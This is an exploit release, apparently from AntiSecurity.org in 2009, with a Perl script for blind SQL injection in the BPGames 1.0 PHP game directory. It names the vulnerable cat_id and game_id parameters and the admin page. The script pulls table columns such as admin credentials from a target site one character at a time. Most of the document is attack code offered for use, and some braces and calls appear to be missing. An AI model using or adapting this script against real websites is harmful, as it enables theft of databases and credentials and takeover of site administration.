BPGames version 1.0 blind SQL injection exploit.
# | AntiSecurity[dot]org |
# | Title : BPGames 1.0 blind SQL Injection Exploit |
# | Software : BPGames |
# | Vendor : http://bpowerhouse.info |
# | Date : 22 September 2009 ( Indonesia ) |
# | Author : OoN_Boy |
# | Contact : oon.boy9@gmail.com |
# | Web : http://oonboy.info |
# | Blog : http://oonboy.blogspot.com |
# | Technology : PHP |
# | Database : MySQL |
# | Version : 1.0 |
# | License : GNU GPL |
# | Price : $29.90 |
# | Description : is a game directory site script. The script |
# | supports multi-language settings. Site users |
# | can search for games according to categories |
# | Google Dork : gwe ganteng :P |
# | Exploit : http://localhost/[path]/main.php?cat_id=[sql] |
# | http://localhost/[path]/game.php?game_id=[sql]|
# | Aadmin Page : http://localhost/[path]/admin/index.php |
# | Greetz : antisecurity.org batamhacker.or.id |
# | Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
# | yooogy mousekill }^-^{ martfella noname s4va |
# | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |
# | Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
use HTTP::Request;
use LWP::UserAgent;
$cmsapp = 'BPGames';
$vuln = 'main.php?cat_id='; #change vuln game.php?game_id=
#vuln = 'game.php?game_id=';
$string = 'Previous'; #change if any string
#string = 'Instrucciones';
$maxlen = 32;
my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }
printf "\n
| BPGames 1.0 blind SQL Injection Exploit |
print " [+] URL Path : "; chomp($web=<STDIN>);
print " [+] Valid ID : "; chomp($id=<STDIN>);
print " [+] Table : "; chomp($table=<STDIN>); #table name admins
print " [+] Columns : "; chomp($columns=<STDIN>); #column username and password
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
print "\n\n [!] Exploiting $target ...\n\n";
print "\n\n [!] Mission completed.\n\n";
sub get_data() {
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
syswrite(STDOUT, " [-] $table\@$column> ", 255);
for (my $i=1; $i<=$maxlen; $i++) {
my $chr = 0;
my $found = 0;
my $char = 48;
while (!$chr && $char<=57) {
if(exploit($i,$char) =~ /$string/) {
$chr = 1;
$found = 1;
} else { $found = 0; }
if(!$chr) {
$char = 97;
while(!$chr && $char<=122) {
if(exploit($i,$char) =~ /$string/) {
$chr = 1;
$found = 1;
} else { $found = 0; }
if (!$found) {
print "\n"; last;
sub exploit() {
my $limit = $_[0];
my $chars = $_[1];
my $blind = '+AND+SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1)=CHAR('.$chars.')';
my $inject = $target.$vuln.$id.$blind;
my $content = get_content($inject);
return $content;
sub get_content() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
return $res->content;
# Exploit End